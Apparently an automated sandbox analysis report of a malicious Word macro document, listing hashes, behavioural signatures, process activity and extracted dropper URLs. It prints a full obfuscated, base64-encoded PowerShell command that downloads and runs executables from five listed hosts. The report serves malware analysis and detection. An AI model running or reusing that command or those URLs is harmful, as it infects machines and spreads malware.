Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/04/2024, 07:30

General

  • Target

    02b9fdbf0cb415dbd2e1d3720aa8bc70_JaffaCakes118.doc

  • Size

    193KB

  • MD5

    02b9fdbf0cb415dbd2e1d3720aa8bc70

  • SHA1

    1884c74f8e4e90ce81a96bcb30e8842afbcba1ea

  • SHA256

    b8471a4e8094436017a60c310e7c020507e74c936d412f685316f82f5c3357cf

  • SHA512

    258dc593b2fdbfca3f5432261fba7f4faa4a6c5002418b0ecfbe219d1a276412989524055ca084a75f327976848b9db438f18aa3108a7c91a802472110f939b7

  • SSDEEP

    6144:u77HUUUUUUUUUUUUUUUUUUUT52V6JoGXPjm+iNQBA81RqHOOhb6DwN:u77HUUUUUUUUUUUUUUUUUUUTCyoUmQBU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://lizrotihouse.com/logos/1_pR/

exe.dropper

http://jessicazck.com/wp-includes/nB_m/

exe.dropper

http://www.versatilehairshop.com/wp-content/upgrade/p_mR/

exe.dropper

http://cheapesthost.com.ng/cgi-bin/jT_Ld/

exe.dropper

http://temp.wizforward.com/wp-includes/U_ZD/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\02b9fdbf0cb415dbd2e1d3720aa8bc70_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1384
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JAB1AEEAQQBBADQAdwBRAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAFAARAAnACwAJwBEAFUAQQAnACwAJwAxAEIAQQAnACkAOwAkAFQAQQBCAFUAQQBHAEEAQQAgAD0AIAAnADUANwAwACcAOwAkAFcAVQB4AEMAQQBaAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcANABBACcALAAnADQAQQBBACcAKQAsACcAegB3AEQAJwApADsAJABqAEEAMQBBAFUAQQA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUAEEAQgBVAEEARwBBAEEAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAZQAnACwAJwAuAGUAJwApADsAJABpAEcAbwBRAEEAQQBHAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAG8AeABBACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnADQAQQBBACcALAAnAEIAJwApACwAJwB4ACcAKQA7ACQATwBHAHcAbwBBAEcAQQBDAD0AJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAGAAdwBFAGIAQwBMAEkAYABFAGAATgB0ADsAJABzAEEAQgBEADEAQQBVAGsAPQAoACIAewA0ADgAfQB7ADEANwB9AHsAMwAzAH0AewA0ADUAfQB7ADQAfQB7ADMAfQB7ADMAMQB9AHsAMwA2AH0AewAyADYAfQB7ADIANwB9AHsAMQA5AH0AewA0ADYAfQB7ADcAfQB7ADMAMAB9AHsAMwA4AH0AewAxADAAfQB7ADEAMwB9AHsANgB9AHsAMQAxAH0AewA5AH0AewA0ADkAfQB7ADgAfQB7ADMANwB9AHsAMgA0AH0AewAxADgAfQB7ADQAMAB9AHsANAA3AH0AewAyADAAfQB7ADUAfQB7ADEANgB9AHsANQAxAH0AewAxAH0AewAxADUAfQB7ADIANQB9AHsAMgAxAH0AewAzADUAfQB7ADIAOQB9AHsAMAB9AHsAMwA5AH0AewAzADQAfQB7ADQAMQB9AHsANQAwAH0AewAxADQAfQB7ADQAMgB9AHsAMQAyAH0AewAyAH0AewAyADIAfQB7ADQAMwB9AHsANAA0AH0AewAyADgAfQB7ADMAMgB9AHsAMgAzAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGoAVAAnACwAJwBfAEwAZAAnACkALAAnAGEAZAAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBtACcALAAnAGMAbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAYQAnACwAJwByAGQALgAnACkAKQAsACcALgBjAG8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB1AHMAZQAnACwAJwBvACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALgBjACcALAAnAG8AbQAnACkALAAnAEAAaAB0ACcALAAnAHoAJwAsACcAcgBzACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHAAOgAvACcALAAnAC8AJwApACwAJwBkAGUAcwAnACwAJwB0ACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAegAnACwAJwBmAG8AcgAnACkALAAnAHcAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcALwAnACwAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEIAXwBtACcALAAnAG4AJwApACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAC4AJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAbQBwACcALAAnAHQAZQAnACwAJwAvAC8AJwApACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwB0ACcALAAnAC8AQABoAHQAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBfAG0AUgAnACwAJwAvAHAAJwAsACcAZQAnACkALAAnAHAAJwApACwAJwAvAHcAJwAsACcAdABwADoAJwAsACcAZQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAagBlAHMAcwAnACwAJwBpACcALAAnAC8AJwApACwAJwAvACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHMAJwAsACcAaABvAHAAJwApACwAJwBzAHQAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAcAAtAGkAJwAsACcALwB3ACcAKQApACwAJwBaAEQALwAnACwAJwBsACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAJwAsACcAcAAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC8ALwBjACcALAAnAGgAZQBhACcALAAnADoAJwApACkALAAnAGgAdAAnACwAJwB0AHAAOgAnACwAJwBVACcALAAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAJwAvACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAuAG4AZwAvACcALAAnAG0AJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALQAnACwAJwBiAGkAbgAnACkALAAnAGMAZwBpACcAKQAsACgAIgB7ADMAfQB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwAvAHcAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHAAJwAsACcALQBpAG4AYwAnACkALAAnAGMAbwBtACcALAAnAGMAawAuACcAKQAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBnAG8AcwAnACwAJwAvADEAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwBsAG8AJwAsACcAbQAnACkAKQAsACcAXwAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGkAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAJwAsACcAbwAnACwAJwAvAGwAaQB6AHIAJwApACwAJwAvACcAKQAsACcAdAB0ACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AJwAsACcAYwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGgAJwAsACcAbwBzAHQALgAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBSAC8AQAAnACwAJwBfAHAAJwApACwAJwBhAHQAaQAnACwAJwBsAHUAJwAsACcALwBAAGgAJwAsACcAaABhAGkAJwAsACcAcAAnACwAJwB3AGkAJwAsACcAYwBsAHUAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGQAZQAnACwAJwBzAC8AJwApACwAJwBoACcALAAnAGMAYQAnACwAJwByACcALAAnAGgAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwB2AGUAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALgAnACwAJwB3AHcAdwAnACkAKQAsACcAOgAnACwAKAAiAHsAMgB9AHsAMwB9AHsANAB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHAAJwAsACcAZwByACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAYwBvAG4AJwAsACcAcAAtACcAKQAsACcAdABlAG4AJwAsACcAdAAvAHUAJwApACkALgAiAHMAUABMAGAAaQBUACIAKAAnAEAAJwApADsAJABUAEEARAB3AEEAQQBCAD0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBBAEEAJwAsACcAQQBVAEEAJwAsACcAegBjACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE4AVQBvAEEAUQBEAEQAIABpAG4AIAAkAHMAQQBCAEQAMQBBAFUAawApAHsAdAByAHkAewAkAE8ARwB3AG8AQQBHAEEAQwAuACIARABvAHcAbgBsAG8AYABBAEQAYABGAGAAaQBMAEUAIgAoACQATgBVAG8AQQBRAEQARAAsACAAJABqAEEAMQBBAFUAQQA0ACkAOwAkAGgAbwA0AEEARwBHAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADQAXwBBACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEIAQgBaACcALAAnAEwANAAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABqAEEAMQBBAFUAQQA0ACkALgAiAEwARQBuAGAARwBgAFQASAAiACAALQBnAGUAIAAzADkAOQA5ADgAKQAgAHsAJgAoACcASQBuAHYAbwAnACsAJwBrAGUAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAagBBADEAQQBVAEEANAA7ACQAWQBBAEIAQQB3AHcAawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAEIARAAnACwAJwBEAHgAJwApACwAJwBkAFUAdwAnACkAOwBiAHIAZQBhAGsAOwAkAEcARwBBAGMAUQBVAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBBAEEAJwAsACcAZgBfACcALAAnAEQAVQBrACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgBBAEEAVQBBAFEAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAEIAQQB3ACcALAAnAFUAWgAnACwAJwBQAEEAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2208
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3844 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1388

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u202eer1.qtn.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1384-59-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-34-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-3-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-4-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-8-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-88-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-6-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-5-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-9-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-10-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/1384-11-0x00007FFE89080000-0x00007FFE89090000-memory.dmp

      Filesize

      64KB

    • memory/1384-22-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-23-0x0000013E7D340000-0x0000013E7D540000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-30-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-31-0x0000013E76F80000-0x0000013E77780000-memory.dmp

      Filesize

      8.0MB

    • memory/1384-32-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-33-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-86-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-1-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-2-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-7-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-87-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-54-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-55-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-56-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-57-0x00007FFECB7B0000-0x00007FFECB9A5000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-0-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-60-0x0000013E7D340000-0x0000013E7D540000-memory.dmp

      Filesize

      2.0MB

    • memory/1384-61-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-62-0x0000013E76F80000-0x0000013E77780000-memory.dmp

      Filesize

      8.0MB

    • memory/1384-63-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-64-0x0000013E78D90000-0x0000013E79D60000-memory.dmp

      Filesize

      15.8MB

    • memory/1384-84-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/1384-85-0x00007FFE8B830000-0x00007FFE8B840000-memory.dmp

      Filesize

      64KB

    • memory/2208-52-0x00007FFE9DD60000-0x00007FFE9E821000-memory.dmp

      Filesize

      10.8MB

    • memory/2208-44-0x0000021DA5920000-0x0000021DA5942000-memory.dmp

      Filesize

      136KB

    • memory/2208-48-0x00007FFE9DD60000-0x00007FFE9E821000-memory.dmp

      Filesize

      10.8MB